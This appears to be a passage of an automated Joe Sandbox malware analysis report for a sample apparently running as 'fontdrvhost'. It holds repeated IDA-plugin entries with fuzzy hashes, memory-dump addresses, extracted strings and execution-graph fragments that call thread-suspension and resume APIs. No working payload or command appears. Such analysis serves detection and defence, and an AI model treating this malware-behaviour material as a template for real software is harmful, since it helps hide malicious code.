                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fb8e627248e0c8b670f96cdba85e9823f166c03c408b0861a02415d76fb0884a
                                                                    • Instruction ID: e288ff6f89e50b15c09d7bf3c6bb268281289fc20f22f5bcdeeff3078d444e86
                                                                    • Opcode Fuzzy Hash: fb8e627248e0c8b670f96cdba85e9823f166c03c408b0861a02415d76fb0884a
                                                                    • Instruction Fuzzy Hash: 6771E031B0C44A8FE778DA5889675F837E0FF46350F0403B9D0DEC75A2DB18B8869681
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dcc71a243d068b2b5e84f31e1575327b792c08f8ba77da894581da65996298f5
                                                                    • Instruction ID: 023362ffc58bbeb8c81e0052267c3f91121fa23c36ff3ace6417c88d74341c47
                                                                    • Opcode Fuzzy Hash: dcc71a243d068b2b5e84f31e1575327b792c08f8ba77da894581da65996298f5
                                                                    • Instruction Fuzzy Hash: C581A930B0CB4B8FE379DB64D1A656577B1FF44344F54497EC48E87A92CB29B8829B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c49e1b2c77f69a11e804289238f158c3a103c49a00f853d93402abfe17580731
                                                                    • Instruction ID: d0f07cbe54fbefb8d881e36f95360332ebe6e3ddf87fbdcea420c3f5cc3bf759
                                                                    • Opcode Fuzzy Hash: c49e1b2c77f69a11e804289238f158c3a103c49a00f853d93402abfe17580731
                                                                    • Instruction Fuzzy Hash: 9481AF30F0864A8FEBA8EB688465AB97BB1EF15300F0441FED44ED32D6DE746984DB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    • Instruction Fuzzy Hash: 8231E520A4E3C64FE753937498696E93F71BF43364F1802FAE089CE4A3CB990595D752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bcef21a1a1e39b094479a1d63bd6bb3a1d8e7d71ddfd9eefaed5cc4af2564254
                                                                    • Instruction ID: 11cd6d925d333a0643a486e3469c995311110e2c17b6bf2c9df5f3cf38c3d8df
                                                                    • Opcode Fuzzy Hash: bcef21a1a1e39b094479a1d63bd6bb3a1d8e7d71ddfd9eefaed5cc4af2564254
                                                                    • Instruction Fuzzy Hash: E931E630B1854BCFDBB8DF9488A15BD77B1FF54348F9400BAD40ED6192DB3969A0AB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee4fdc8b0d12a8d15ffe8547b4ff60c0db4c302dd41ecc65fa8b0f57f95d676a
                                                                    • Instruction ID: ebc2921f645acc37a3542eccd4e672425bf65b3d175e253dc1cb8ba93b2b34c5
                                                                    • Opcode Fuzzy Hash: ee4fdc8b0d12a8d15ffe8547b4ff60c0db4c302dd41ecc65fa8b0f57f95d676a
                                                                    • Instruction Fuzzy Hash: B6319E30E0964E8BEBA4EB98C8656BD77F1FF58340F11013AD00AD32A6DE752A458B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 56de89674e3c01ef534750c6e442f67eda7506ff6204d061834c24dee7cd1264
                                                                    • Instruction ID: 84828243590e11f1a57447815eb79f901f154cef3420e1d6c8622dbe91fa363b
                                                                    • Opcode Fuzzy Hash: 56de89674e3c01ef534750c6e442f67eda7506ff6204d061834c24dee7cd1264
                                                                    • Instruction Fuzzy Hash: AB314935B0E68E8BE771ABA8C8202FDB7A0EF41310F05567BC495961E2CBB82605CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: eb3b97b17df453c82e1b38b2ad61058b7c19f9f05a891f9cd95ea1666f9e78a1
                                                                    • Instruction ID: 03d02c55007bac3bb43f2b1a406885958c6eaf1c866d8e1bf3549b2413a9bf5a
                                                                    • Opcode Fuzzy Hash: eb3b97b17df453c82e1b38b2ad61058b7c19f9f05a891f9cd95ea1666f9e78a1
                                                                    • Instruction Fuzzy Hash: 2731C434F1C54B8EEBB8DB9884665BD77B1FF44340F5001BAD40ED2681DB39A984AB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3c1dc13fa2d824e250d71c0c5677256ff459e810b59182a3967b0f6bef72b073
                                                                    • Instruction ID: 9b7d7fe5532bab9886cd479aa2e7c35c1ed7accd3e2252cf97a94616591cedd5
                                                                    • Opcode Fuzzy Hash: 3c1dc13fa2d824e250d71c0c5677256ff459e810b59182a3967b0f6bef72b073
                                                                    • Instruction Fuzzy Hash: 1B214710B1C0D74AE73A875844705B47F71EF82310F1886FAD4AF8B4D7DA2CA881E780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bd429becea75a75335114bd624fa7e11ed412c44273952590e4615d55b00f608
                                                                    • Instruction ID: 3620325a543a7af2405096f9faed548b9a926fb274cdf459f4de348edfa9ba56
                                                                    • Opcode Fuzzy Hash: bd429becea75a75335114bd624fa7e11ed412c44273952590e4615d55b00f608
                                                                    • Instruction Fuzzy Hash: D8213971F1CA4E8FDB65DF98C8605ECBBB1FF58740F0401AAD00EE3291DB24A8459B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a7eebad29a58278da9329b4ade323678a0af98ad1459be2e2a64f392ab48eff3
                                                                    • Instruction ID: 7ac9b890b04204971f8d2e7c7a6b6b1e43cc7016506fe423298f1047416892c5
                                                                    • Opcode Fuzzy Hash: a7eebad29a58278da9329b4ade323678a0af98ad1459be2e2a64f392ab48eff3
                                                                    • Instruction Fuzzy Hash: 02314D71F1881B8FEB64EB88C9A29FDB7B1FF99340F500275D40E972D5DB2468819B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 445d52a665e01535414558b57d29a6fbcabb2edfd5fb1581fd993c35c2215adb
                                                                    • Instruction ID: aeebdc36b2a5262736a493fbcf590cafd05e397570480fbb90c43f43194d0fb0
                                                                    • Opcode Fuzzy Hash: 445d52a665e01535414558b57d29a6fbcabb2edfd5fb1581fd993c35c2215adb
                                                                    • Instruction Fuzzy Hash: 0221E831F0891D9FDFA8DB58D4A5AECB3B1FF68310F0141AA905EE3295CB35A981CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fb56577910eefea1c71211ca75d89dfa4159f50d1ca2b80e2dfb12c46ebef29
                                                                    • Instruction ID: d7f2191683b8367338d132f438830af5336521da52336350fe8c2e12878bb6fa
                                                                    • Opcode Fuzzy Hash: 7fb56577910eefea1c71211ca75d89dfa4159f50d1ca2b80e2dfb12c46ebef29
                                                                    • Instruction Fuzzy Hash: 3121E730A1891D9FDFA9EB58C865AADB7B1FF5C350F0041AA901EE3291CF35A9818B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02f7b0fe212aa85e1ad47616f3f4e33453bec84717c502601885120c1ffbf67c
                                                                    • Instruction ID: 3d32ec0768e0c18017b299ff996ee268039bd73b8ada6a7a9c2fc3c5b26576b2
                                                                    • Opcode Fuzzy Hash: 02f7b0fe212aa85e1ad47616f3f4e33453bec84717c502601885120c1ffbf67c
                                                                    • Instruction Fuzzy Hash: 11213031F18A1A9FDB64EB98D8619A9B3F1FF58750F144139D00ED3692CF24BC529B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 563de7a2a1fe8070a0889eb3f44fc308557952e169eca46d8caebeecc0d91c05
                                                                    • Instruction ID: 0b16fc53cf382207b2a14ba92e2ca73ddb9dafd3f0915bac3caa15214fad16c3
                                                                    • Opcode Fuzzy Hash: 563de7a2a1fe8070a0889eb3f44fc308557952e169eca46d8caebeecc0d91c05
                                                                    • Instruction Fuzzy Hash: A921E530A0C68D8FCB66EB64C865AE57FB0EF4A350F0400EAD40DC71A2CA395985CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4fb26d78a3dc99843a74aacc9904e150f30e6b79990f17a10a1d94abce3db16b
                                                                    • Instruction ID: 81d9cf4df27c841f9e5eca1cc625146e3351d005e9c7575b225d46228fc1a8ca
                                                                    • Opcode Fuzzy Hash: 4fb26d78a3dc99843a74aacc9904e150f30e6b79990f17a10a1d94abce3db16b
                                                                    • Instruction Fuzzy Hash: 3431B870A0491C8FCFA8DF18C854BE9B3F1EB68305F1041EAD10EE32A5DA75AA84CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ddfe269f575f7656f1a2fa0f2eb20a8346cf0bfd0138d93f4aa3d810007f315
                                                                    • Instruction ID: 0c1433247c0b2cfab9724a2f6bc7a9a2d128624991eb1d648e24ef1e2e9dddaa
                                                                    • Opcode Fuzzy Hash: 7ddfe269f575f7656f1a2fa0f2eb20a8346cf0bfd0138d93f4aa3d810007f315
                                                                    • Instruction Fuzzy Hash: 6921D330A0C68D8FDB56EF64C865AE87FB0EF5A340F0400EAD40DD71A2CA395985CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a717cf9a01e254af76d312236f071eb53f388c77514a1fb09f0fd62c44e75f18
                                                                    • Instruction ID: 437f01c207f8ba817e487a87782959a44d869db2f2062499c432a0460bba4624
                                                                    • Opcode Fuzzy Hash: a717cf9a01e254af76d312236f071eb53f388c77514a1fb09f0fd62c44e75f18
                                                                    • Instruction Fuzzy Hash: 4F21F632F0961A4FE769FBE894656EC77F0EF59350F14017EC04DC3293CA2858429780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd6954d02b94fb22c7c09529a9fac7a997f945162343891180f397d35463dfb9
                                                                    • Instruction ID: c41aa8db7f7efb21cab97fe978cd924430f6f7d705997a58cc566018bc1bd42e
                                                                    • Opcode Fuzzy Hash: fd6954d02b94fb22c7c09529a9fac7a997f945162343891180f397d35463dfb9
                                                                    • Instruction Fuzzy Hash: 2321E930A1891E8FEB94EBA8C8949BDB7F1FF28300B11057AD419D72A5EB74A941CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2cd2973364b647ae9eaf4551f3ac6470f494e51bcfbcc06ae2ed7c868b5182d
                                                                    • Instruction ID: 1c8b6cefba88b8651ffd32ac2e5be69ef98fb9523b475d182d94a31053a11c6b
                                                                    • Opcode Fuzzy Hash: b2cd2973364b647ae9eaf4551f3ac6470f494e51bcfbcc06ae2ed7c868b5182d
                                                                    • Instruction Fuzzy Hash: 8811D231F1CA5A4FEB69AB9888326ECB7E1EF59350F15017AD00DC32C2DE2868458351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ba4d8b0cc739a35097f29651efe3d0bf72bc264e8b8f9cbcba49b273908dccb1
                                                                    • Instruction ID: 9d909be9442ca70ede09d64f5f7a45b148cbbd216f02dca186c2c9660221353f
                                                                    • Opcode Fuzzy Hash: ba4d8b0cc739a35097f29651efe3d0bf72bc264e8b8f9cbcba49b273908dccb1
                                                                    • Instruction Fuzzy Hash: B7112912F4D1938BF63A56E458314BD26745F45BE0F5801BBD84E831C6CE0D28C533D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1682547207.00007FFD9C0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9c0f0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 554f778c2bb88fd795df2a755d97b33994b0d4c881e4e35632183364ed263425
                                                                    • Instruction ID: 46ff11c0fc6e99104c4b7de3c4f6de3cd0d637bb1ea1942e75dcc162220fe5a3
                                                                    • Opcode Fuzzy Hash: 554f778c2bb88fd795df2a755d97b33994b0d4c881e4e35632183364ed263425
                                                                    • Instruction Fuzzy Hash: A2110131B08A0B4EEB65BB6594218FA73E1FF64290F00063AD44EC34D2CF28A98586A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1671529877.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9ba10000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$/EUz$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$D uM$D uM$E$F$G$H$I$J$K$L$M$N$O$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$alZi$b$c$d$e$f$g$h$h&E$h&E$i$j$k$l$m$n$o$p$q$r$s$t$t`$t`$u$v$w$x$y$z${$|$}$~$fC$+mB$+mB$+mB$E![$E![$fD$fD$fD
                                                                    • API String ID: 0-81692576
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0_I$0_I$0_I
                                                                    • API String ID: 0-3182682118
                                                                    • Opcode ID: 92b9a19e0af4b76a20f089bc2fe4a9670c8dd39cfdf2d26c0bbc24d8c72fb28e
                                                                    • Instruction ID: c955ca34f751fae339b0bb3c4b4aeb4806e03511e286879c78fe2d7fd513aba2
                                                                    • Opcode Fuzzy Hash: 92b9a19e0af4b76a20f089bc2fe4a9670c8dd39cfdf2d26c0bbc24d8c72fb28e
                                                                    • Instruction Fuzzy Hash: 7ED10893B0FAC60BE36545BC48361657F5ABFD259470A42FBD0854F0FBA82ABE05C385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1674632989.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bbc0000_ZT3pxe2Tb4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0_I$0_I
                                                                    • API String ID: 0-1343597779
                                                                    • Opcode ID: 509c2325a40287a25e06fb4ce852e27264e63052942868cd61deeb60dc7337e9
                                                                    • Instruction ID: 99cf546418fde866de8171efbbce7ad48dbb3f1bd5e82dd35f983a11e81fcbb8
                                                                    • Opcode Fuzzy Hash: 509c2325a40287a25e06fb4ce852e27264e63052942868cd61deeb60dc7337e9
                                                                    • Instruction Fuzzy Hash: 24E1B78770FBC61BE76285B848291555F9B7F9219475E40FBC0944F0FBA42EFA18C346
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:3%
                                                                    Dynamic/Decrypted Code Coverage:83.3%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:12
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 19175 7ffd9bbb1f85 19176 7ffd9bbb1f9f GetFileAttributesW 19175->19176 19178 7ffd9bbb2065 19176->19178 19167 7ffd9bbb02f9 19168 7ffd9bbb0307 FindCloseChangeNotification 19167->19168 19170 7ffd9bbb03e4 19168->19170 19179 7ffd9bbb0190 19180 7ffd9bbb019a ResumeThread 19179->19180 19182 7ffd9bbb02a4 19180->19182 19171 7ffd9bbaeaad 19172 7ffd9bbaeabb SuspendThread 19171->19172 19174 7ffd9bbaeb94 19172->19174

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 353 7ffd9b9f0da8-7ffd9b9f0dbf 354 7ffd9b9f0dc1 353->354 355 7ffd9b9f0dc2-7ffd9b9f0df9 353->355 354->355 357 7ffd9b9f0dfb 355->357 358 7ffd9b9f0e00-7ffd9b9f0eb7 call 7ffd9b9f07d0 355->358 357->358 371 7ffd9b9f0eb9-7ffd9b9f0ece 358->371 372 7ffd9b9f0ecf-7ffd9b9f0f37 358->372 371->372 379 7ffd9b9f0f38-7ffd9b9f0fa8 372->379 386 7ffd9b9f0faa-7ffd9b9f0fb0 379->386 387 7ffd9b9f0fc0-7ffd9b9f0fc1 379->387 388 7ffd9b9f0fb2 386->388 387->388 389 7ffd9b9f0fc3-7ffd9b9f0fe3 387->389 388->379 390 7ffd9b9f0fb4-7ffd9b9f0fbe 388->390 393 7ffd9b9f0feb-7ffd9b9f10dc 389->393 390->387
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 24d9789df1320439b16a85b784e7f4f374483bde01c39f74cb828b1b81d01323
                                                                    • Instruction ID: 32f99b1682eb95844cb81338240519462ef645d73c88a7db4cdcae4ef657d908
                                                                    • Opcode Fuzzy Hash: 24d9789df1320439b16a85b784e7f4f374483bde01c39f74cb828b1b81d01323
                                                                    • Instruction Fuzzy Hash: C9A1CE75B19A8D8FE798EF68C8647A97FE1FF95310F1001BAD049D72E6CA782901CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9
                                                                    • API String ID: 0-3254877420
                                                                    • Opcode ID: 7ffb8ba514f0547423313594b8a3bc12709f30a72b049320a7e7d9c40889e777
                                                                    • Instruction ID: 7012afd3a36d54cc62561f9da4b2b5c4763730b91161369d985f37068ecd3eeb
                                                                    • Opcode Fuzzy Hash: 7ffb8ba514f0547423313594b8a3bc12709f30a72b049320a7e7d9c40889e777
                                                                    • Instruction Fuzzy Hash: 9011D236B2964E8FCB44EF2CE4916E977E0FF94325F010576E849D3250D730A955CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 8 7ffd9bbb0190-7ffd9bbb01c9 10 7ffd9bbb01cb 8->10 11 7ffd9bbb01cc-7ffd9bbb02a2 ResumeThread 8->11 10->11 15 7ffd9bbb02aa-7ffd9bbb02f4 11->15 16 7ffd9bbb02a4 11->16 16->15
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^8
                                                                    • API String ID: 0-1095223944
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
